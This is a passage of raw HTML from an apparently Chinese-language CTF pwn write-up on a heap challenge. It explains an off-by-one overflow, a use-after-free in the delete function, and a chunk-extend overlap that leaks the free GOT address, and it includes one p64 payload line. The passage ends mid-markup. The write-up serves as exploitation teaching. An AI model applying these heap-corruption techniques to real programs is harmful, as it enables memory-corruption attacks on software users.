data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5322G2R_QBIU8XNB2ZC5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-228\"  sizes=\"auto, (max-width: 998px) 100vw, 998px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ud03edbf8\">\u7ed3\u5408\u4e4b\u524d\u7684\u77e5\u8bc6\uff0c\u53ef\u4ee5\u5927\u6982\u63a8\u7b97\u51fa\u8fd9\u6837\u4e00\u4e2a\u7ed3\u6784\u4f53\u6570\u7ec4\uff0cheaparray[n]\u662f\u4e2a\u6307\u9488\u6570\u7ec4\uff0c\u6bcf\u4e2a\u6307\u9488\u6307\u5411\u4e00\u4e2a\u7ed3\u6784\u4f53heap\u3002\u6bcf\u4e2aheap\u670916B\uff0c\u5176\u4e2d\u4e00\u4e2a8B\u662f\u6307\u9488\uff0c\u6307\u5411\u4e00\u4e2a\u5b57\u7b26\u4e32\uff0c\u4e5f\u5c31\u662f\u5806\u7684content\uff0c\u5269\u4e0b\u76848B\u662f\u4e2a\u6574\u578b\u53d8\u91cf\uff0c\u4ee3\u8868content\u7684\u5927\u5c0f<\/p>\n\n\n\n<p id=\"u00a67ce9\">\u8f6c\u6362C\u4ee3\u7801\uff1a<\/p>\n\n\n\n<p id=\"u4fe06c87\">heap{<\/p>\n\n\n\n<p id=\"u2db7186e\">size_t size<\/p>\n\n\n\n<p id=\"u737d4d6c\">char *content<\/p>\n\n\n\n<p id=\"u2fec323d\">}<\/p>\n\n\n\n<p id=\"u8c79ed75\">\u518d\u770b\u770bedit:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MSNHEJTJY7NFRE68ZQV-1024x534.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"534\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MSNHEJTJY7NFRE68ZQV-1024x534.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-229\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u67b2643b\">\u6539\u53d8content\u7684\u5185\u5bb9\uff0c\u4f46\u662f\u53d1\u73b0\u5b83\u8fd9\u91cc\u53ef\u4ee5\u591a\u5199\u4e00\u4e2a\u5b57\u8282\uff0c\u5b58\u5728off by one\u6ea2\u51fa<\/p>\n\n\n\n<p id=\"u25bf18cf\">show\u51fd\u6570\uff1a<\/p>\n\n\n\n<p id=\"u3bc83d06\">\u6253\u5370size\u548ccontent\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/ATXZ9F@NDS85Q2W2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"894\" height=\"735\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/ATXZ9F@NDS85Q2W2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-230\"  sizes=\"auto, (max-width: 894px) 100vw, 894px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue07c70f8\">delete\u51fd\u6570:<\/p>\n\n\n\n<p id=\"ub23865dc\">\u5148\u540efree\u6389content\u6307\u9488\u548c\u7ed3\u6784\u4f53\u672c\u8eab\uff0c\u7136\u540e\u628a\u7ed3\u6784\u4f53\u6307\u9488\u7f6e\u7a7a\uff0c\u4f46\u662fcontent\u6307\u9488\u5e76\u6ca1\u6709\u7f6e\u7a7a\uff0c\u5b58\u5728UAF<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/JQJFLL8EMJA95SD5ZBIF.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"842\" height=\"732\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/JQJFLL8EMJA95SD5ZBIF.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-231\"  sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7916138b\">\u540c\u65f6\uff0c\u6ca1\u6709\u540e\u95e8\u51fd\u6570\u3002<\/p>\n\n\n\n<p id=\"u00917dca\">\u7531\u4e8eoff by one\uff0c\u8003\u8651heap extend<\/p>\n\n\n\n<p id=\"u40f0dfd8\">heap extend\u9700\u8981\u8986\u76d6\u4e0b\u4e00\u4e2achunk\u7684size\u5b57\u6bb5\uff0c\u4e5f\u5c31\u610f\u5473\u7740\u9700\u8981\u89e6\u53d1prev size\u590d\u7528\uff0c\u4e0d\u7136\u6ea2\u51fa\u5c31\u53ea\u80fd\u6ea2\u51fa\u5230prev size\u53bb<\/p>\n\n\n\n<p id=\"ud893614f\">\u89e6\u53d1prev size\u590d\u7528\u7684\u6761\u4ef6\uff08\u975e\u5e38\u91cd\u8981\uff09\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SIMJDAPULT2WS1DT_V0-2-1024x464.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"464\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SIMJDAPULT2WS1DT_V0-2-1024x464.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-234\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1fbdc041\">\u53ea\u6709\u5bf916\u53d6\u4f59\u540e\uff0c\u591a\u51fa\u6765\u7684\u5b57\u8282\u5c0f\u4e8e\u7b49\u4e8e8B\uff0c\u624d\u4f1a\u653e\u5165\u4e0b\u4e00\u4e2achunk\u7684prevsize\uff01<\/p>\n\n\n\n<p id=\"u8d230297\">\u6240\u4ee5\u7b2c\u4e00\u4e2achunk\u7684size\u9700\u8981\u8bbe\u7f6e\u4e3a0x18(0x28,0x38\u8fd9\u4e9b\u5176\u5b9e\u90fd\u53ef\u4ee5)\uff0c\u7b2c\u4e8c\u4e2achunk\u8bbe\u7f6e\u4e3a0x10<\/p>\n\n\n\n<p id=\"u7e6ed027\">\u5c24\u5176\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5728create\u64cd\u4f5c\u65f6\u5019\uff0c\u5b9e\u9645\u4e0a\u6bcf\u6b21\u90fd\u7533\u8bf7\u4e86\u4e24\u4e2achunk\uff0c\u4e00\u4e2a\u662f\u7ed3\u6784\u4f53\uff0c\u4e00\u4e2a\u662fcontent\u5185\u5bb9\u6307\u9488\uff0c\u8bbe\u7f6e\u7684size\u5927\u5c0f\u5b9e\u9645\u4e0a\u662fcontent\u6307\u9488\u7684\uff0c\u7531\u4e8e\u7533\u8bf7\u7684chunk\u662f\u7d27\u6328\u7740\u7684\uff0c\u6240\u4ee5\u5806\u5185\u5b58\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n<p id=\"ucbfe6a92\">\uff08\u7531\u4e8e\u7248\u672c\u539f\u56e0\uff0c\u6211\u5728\u521b\u5efachunk\u65f6\u5019\u4e00\u5f00\u59cb\u4f1a\u81ea\u52a8\u521b\u5efa\u4e00\u4e2a0x290\u7684chunk\uff09<img decoding=\"async\" width=\"338\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/47670780\/1731386009726-9af17eca-c39a-4a75-8923-16a995f94b72.png\"><\/p>\n\n\n\n<p id=\"u4384b3cc\">\u4e0d\u5f71\u54cd\uff0c\u521b\u5efa\u4e24\u4e2achunk\u540e<code>x\/20gx + \u5730\u5740<\/code>\u67e5\u770b\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/B878MQDYMLKK@5NRJS.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"275\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/B878MQDYMLKK@5NRJS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-237\"  sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7752bc13\">\u91cd\u590d\u6d4b\u8bd5\u4f1a\u53d1\u73b0\uff0c\u6709\u65f6\u5019content\u5927\u5c0f\u5206\u914d\u7684\u4e0d\u662f0x10,\u6700\u540e\u4e5f\u4f1a\u5f97\u5230\u4e00\u4e2a0x20\u7684chunk\uff0c\u8fd9\u662f\u7531\u4e8e\u5806\u5206\u914d\u7684\u5bf9\u9f50\u673a\u5236<\/p>\n\n\n\n<p id=\"u56beac85\">\u7ed9chunk1\u7684content\u7684size\u5927\u5c0f\u662f24\uff0cchunk2\u7684content\u7684size\u5927\u5c0f\u662f16\uff0c\u4e4b\u6240\u4ee5\u8fd9\u4e48\u5206\u914d\uff0c\u662f\u56e0\u4e3a26\u5bf916\u53d6\u4f59\u521a\u597d\u662f8\uff0c\u5c31\u4f1a\u628a\u4e0b\u4e00\u4e2achunk\u7684prevsize\u5360\u7528\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RKD1CBM77_CPP_RGN9PNY.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"257\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RKD1CBM77_CPP_RGN9PNY.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-238\"  sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue23ae241\">edit chunk1\uff0c\u8f93\u516525\u4e2af\uff08\u537366\uff09\uff0c\u53ef\u4ee5\u770b\u5230chunk2\u7ed3\u6784\u4f53\u7684size\u5df2\u7ecf\u88ab\u8986\u76d6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GFSBQC9EOQISA9NLO.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"621\" height=\"219\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GFSBQC9EOQISA9NLO.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-239\"  sizes=\"auto, (max-width: 621px) 100vw, 621px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf3c5d7a7\">\u8fd9\u6837\u5c31\u80fd\u901a\u8fc7\u4fee\u6539size\u5927\u5c0f\u5b9e\u73b0chunk extend\uff0c\u628achunk2\u7ed3\u6784\u4f53\u548cchunk2content\u5408\u5e76\u3002<\/p>\n\n\n\n<p id=\"u2c1129a1\">\u7531\u4e8e\u6ca1\u6709system\u51fd\u6570\uff0c\u6240\u4ee5\u9700\u8981\u901a\u8fc7libc\u65b9\u5f0f\u6cc4\u9732\uff0c\u627e\u5230\u51fd\u6570\u539f\u6709\u7684plt\u51fd\u6570\uff0c\u8fd9\u91cc\u7528free\u51fd\u6570\u3002\u9996\u5148\u5148\u6e05\u695a\u6211\u4eec\u9700\u8981\u5728\u4ec0\u4e48\u5730\u65b9\u624d\u80fd\u6cc4\u9732\uff1a\u5fc5\u987b\u628acontent\u6307\u9488\uff08\u5730\u5740\uff09\u6539\u6210free_got\u5730\u5740\u624d\u80fd\u6cc4\u9732\uff0c\u6709\u53ef\u80fd\u4f1a\u7591\u60d1\uff0c\u4e3a\u4ec0\u4e48\u4e0d\u80fd\u628afree_got\u5199\u5165content\u7533\u8bf7\u7684\u5185\u5bb9\u91cc\u9762\u6253\u5370\u51fa\u6765\uff1f\u56e0\u4e3a\u8fd9\u6837\u6253\u5370\u5b9e\u9645\u4e0a\u6253\u5370\u51fa\u6765\u7684\u662ffree_got\u7684\u5730\u5740\uff0c\u800cfree_got\u5b58\u7684\u503c\u624d\u662ffree\u7684\u771f\u5b9e\u5730\u5740\uff01\u6240\u4ee5\u5f97\u628afree_got\u8986\u76d6content\u6307\u9488\uff0c\u8fd9\u6837\u6253\u5370\u51fa\u6765\u7684\u5185\u5bb9\u624d\u662ffree\u7684\u771f\u5b9e\u5730\u5740\uff01<\/p>\n\n\n\n<p id=\"udc8bd659\">\u4f46\u662f\u9898\u76ee\u4e2d\uff0c\u5728\u7533\u8bf7chunk\u65f6\u5019\u5c31\u4f1a\u9ed8\u8ba4\u7ed9content\u6307\u9488malloc\u4e00\u4e2a\u65b0\u5730\u5740\uff0c\u600e\u4e48\u529e\uff1f\u8fd9\u65f6\u5019chunk extend\u5c31\u5927\u663e\u795e\u901a\u4e86\u3002\u5982\u679c\u6211\u4eec\u628achunk2\u7684\u7ed3\u6784\u4f53\u548c\u5b83\u7684content\u5408\u5e76\u4e86\uff0c\u7136\u540e\u7533\u8bf7\u4e00\u4e2a\u65b0\u7684chunk3\uff0c\u9996\u5148\u6211\u4eec\u5f97\u5230chunk3\u7684\u7ed3\u6784\u4f53\uff0c\u7136\u540e\u628a\u5b83\u7684content\u7533\u8bf7\u7684\u6307\u9488\u7684\u5185\u5b58\u5927\u5c0f\uff08size\uff09\u7533\u8bf7\u6210\u7b49\u4e8e\u5408\u5e76\u540echunk2\u5927\u5c0f\u7684\u503c\uff0c\u5c31\u4f1a\u628a\u5408\u5e76\u7684chunk2\u5206\u914d\u7ed9\u6211\u4eec\uff0c\u8fd9\u4e2a\u65f6\u5019\u4fee\u6539chunk3\u7684content\u5185\u5bb9\uff0c\u5c31\u80fd\u4fee\u6539\u5230chunk2\u7684content\u6307\u9488\uff0c\u6ce8\u610f\u5230delete\u91cc\u9762chunk2\u7684content\u6307\u9488\u5e76\u6ca1\u6709\u7f6e\u7a7a\uff01\u8fd9\u5c31\u662f\u4f0f\u7b14\u4e86\uff0c\u7136\u540e\u6211\u4eec\u518d\u6253\u5370chunk2\uff0c\u5c31\u80fd\u628afree\u7684\u5730\u5740\u6253\u5370\u51fa\u6765<\/p>\n\n\n\n<p id=\"u060516a2\">\u5173\u4e8e\u4fee\u6539chunk2\u7ed3\u6784\u4f53\u7684size\u4e3a\u4ec0\u4e48\u662f0x41,\u4e00\u4e2achunk2\u7ed3\u6784\u4f53\u4f1a\u81ea\u52a8malloc(0x10)\uff0c\u5176\u4e2d\u5305\u542b\u4e24\u4e2a8B\u7684\u6210\u5458\uff0c\u52a0\u4e0asize\u548cprevsize\u8fd8\u6709\u6807\u5fd7\u4f4d\u76841B\uff0c\u4e00\u5171\u5c31\u662f0x21,\u7136\u540e\u5b83\u7684content\u7533\u8bf7\u7684\u662f0x10,\u5176\u5b9e\u4e5f\u662f0x21,\u90a3\u4e3a\u4ec0\u4e48\u4e0d\u6539\u62100x42\u800c\u662f0x41?\uff0c\u8fd9\u91cc\u6211\u89c9\u5f97\u6709\u4e24\u539f\u56e0\uff0c\u4e00\u4e2a\u662f\u4e0d\u9700\u8981\u5b8c\u5168\u56ca\u62eccontent\uff0c\u56e0\u4e3a\u8fd9\u4e48\u505a\u7684\u76ee\u7684\u5b8c\u5168\u662f\u4e3a\u4e86\u8ba9chunk3\u7684content\u80fd\u62ff\u5230\u542b\u6709chunk2\u7ed3\u6784\u4f53\u7684\u5185\u5b58\uff0c\u5982\u679c\u4e0d\u6539\u53d8chunk2\u7ed3\u6784\u4f53\u7684\u5927\u5c0f\uff0c\u7533\u8bf7chunk3\u65f6\u5019chunk3\u7ed3\u6784\u4f53\u5c31\u4f1a\u5148\u4e00\u6b65\u5360\u7528chunk2\u7ed3\u6784\u4f53\uff0c\u8fd9\u6837content\u5c31\u62ff\u4e0d\u5230chunk2\u7ed3\u6784\u4f53\u4e86\uff0c\u800c\u6539\u53d8chunk2\u7ed3\u6784\u4f53\u5927\u5c0f\u540e\uff0cchunk3\u7684\u7ed3\u6784\u4f53\u5c06\u7533\u8bf7\u4e0d\u5230chunk2\u7ed3\u6784\u4f53\uff0c\u8fd9\u6837chunk3\u7684content\u5c31\u80fd\u62ff\u5230chunk2\u7ed3\u6784\u4f53\u4e86\u3002<\/p>\n\n\n\n<p id=\"ub51f5728\">\u4e8c\u53ef\u80fd\u662f\u7531\u4e8e\u5806\u7684\u5bf9\u9f50\u673a\u5236\u5427\u3002<\/p>\n\n\n\n<p id=\"ufc07ae21\">\u4f46\u662f\u4ec5\u4ec5\u505a\u5230\u7528chunk3\u7684content\u62ff\u5230chunk2\u7684\u7ed3\u6784\u4f53\u8fd8\u4e0d\u884c\uff0c\u56e0\u4e3a\u8981\u6253\u5370\u51fa\u6765\uff0c\u800c\u6253\u5370\u51fd\u6570\u662f\u6253\u5370\u67d0\u4e2achunk\u7ed3\u6784\u4f53\u7684size\u548ccontent\u6307\u9488\u5185\u5bb9\u3002\u867d\u7136\u6211\u4eec\u4fee\u6539\u4e86chunk2\u7ed3\u6784\u4f53\u7684content\u6307\u9488\uff0c\u4f46\u662fchunk2\u7ed3\u6784\u4f53\u5df2\u7ecf\u88abfree\u6389\u800c\u4e14\u7f6e\u7a7a\u4e86\uff01\u6b64\u65f6\u7d22\u5f151\u4e0d\u662fchunk2\u7ed3\u6784\u4f53\uff0c\u800c\u662fchunk3\u7ed3\u6784\u4f53\u3002\u6240\u4ee5\u6211\u4eec\u6539chunk2\u7ed3\u6784\u4f53\u7684content\u6307\u9488\u6ca1\u7528\uff0c\u5fc5\u987b\u6539chunk3\u7ed3\u6784\u4f53\u7684content\u6307\u9488\uff01<\/p>\n\n\n\n<p id=\"u360af99a\">\u90a3\u80fd\u4e0d\u80fd\u505a\u5230\u5462\uff1f<\/p>\n\n\n\n<p id=\"u934100af\">\u5f53\u7136\u53ef\u4ee5\uff0c\u8fd9\u5c31\u662f\u9700\u8981\u5de7\u5999\u6784\u9020\u4e86\u3002\u6211\u4eec\u7ed9chunk2\u7684content\u7533\u8bf7\u7684\u5927\u5c0f\u662f0x10,\u8fd9\u5c31\u5bfc\u81f4content\u7684\u5927\u5c0f\u8ddf\u7ed3\u6784\u4f53\u7684\u5927\u5c0f\u4e00\u81f4\uff0c\u7136\u540echunk extend\u628achunk2\u7ed3\u6784\u4f53\u548ccontent\u5408\u5e76\uff0c\u7136\u540efree\u6389\uff0c\u6b64\u65f6\u7533\u8bf7\u4e00\u4e2achunk3\uff0cbin\u91cc\u9762\u53ef\u4f9b\u4f7f\u7528\u7684chunk\u6709\u4e24\u4e2a\uff0c\u4e00\u4e2a\u5927\u5c0f0x41,\u4e00\u4e2a\u5927\u5c0f0x21,\uff08\u6709\u91cd\u53e0\uff09\u800cchunk3\u7684\u7ed3\u6784\u4f53\u7531\u4e8e\u4e5f\u662f0x21,\u6240\u4ee5\u5c31\u4f1a\u62ff\u5230chunk2\u7684content\u90e8\u5206\uff0c\u5b83\u88ab\u5305\u542b\u5728chunk2\u7ed3\u6784\u4f53\u76840x41\u4e2d\uff0c\u800c\u518d\u7533\u8bf7chunk3\u7684content\u7684\u5927\u5c0f\u5982\u679c\u7533\u8bf70x30(0x31 include flag)\uff0c\u5c31\u4f1a\u62ff\u5230chunk2\u7684\u7ed3\u6784\u4f53\u3002<\/p>\n\n\n\n<p id=\"u2bfe3605\">\u5982\u56fe\u6240\u793a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/48V0FMHY67XVZEDZMG.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"495\" height=\"209\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/48V0FMHY67XVZEDZMG.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-240\"  sizes=\"auto, (max-width: 495px) 100vw, 495px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u670c2106\">\u5927\u7ea2\u6846\u662fchunk2\u7ed3\u6784\u4f53\/chunk3 content<\/p>\n\n\n\n<p id=\"uf37f484f\">\u5c0f\u84dd\u6846\u662fchunk2content\/chunk3 \u7ed3\u6784\u4f53<\/p>\n\n\n\n<p id=\"u8ce76cce\">\u800c\u6211\u4eec\u80fd\u4fee\u6539\u7684\u662fchunk3 content\uff0c\u53ef\u4ee5\u53d1\u73b0\uff0c\u5b83\u53ef\u4ee5\u4fee\u6539\u5230chunk3 \u7684\u7ed3\u6784\u4f53<\/p>\n\n\n\n<p id=\"u0bd60b89\">payload2=p64(0)+p64(0)+p64(0)(prevsize)+p64(21)(size)+p64(30)(chunk\u6210\u5458size)+p64(free_got)<\/p>\n\n\n\n<p id=\"u51c15238\">payload2=p64(0)+p64(0)+p64(0)+p64(21)+p64(30)+p64(free_got)<\/p>\n\n\n\n<p id=\"u448d89da\">\u7136\u540e\u518dshow(1)\uff0c\u5c31\u4f1a\u6253\u5370\u51fa\u6765chunk3\u7684size\u6210\u5458\u548ccontent\u6210\u5458\u7684\u503c\uff0ccontent\u6210\u5458\u4ee5\u53ca\u88ab\u6211\u4eec\u8986\u76d6\u6210\u4e86free_got\uff0c\u5c31\u80fd\u6cc4\u9732free_got\u5730\u5740\uff01<\/p>\n\n\n\n<p id=\"uc854e97b\">\u52a8\u6001\u8c03\u8bd5\u4e00\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/47670780\/1731387748096-417fdaed-0928-4b65-b5af-f40b09b09d7c.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/47670780\/1731387748096-417fdaed-0928-4b65-b5af-f40b09b09d7c.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p id=\"ua499153b\">delete\u6389chunk2\uff0c\u4e5f\u5c31\u662f\u7f16\u53f7\u4e3a1\uff08\u4ece0\u5f00\u59cb\uff09\u7684chunk\u540e\uff0c\u56de\u5230pwndgb\u8f93\u5165bins\u67e5\u770b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/@DSWG2N9OMPCUJ_5VZNQ.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"276\" height=\"249\" 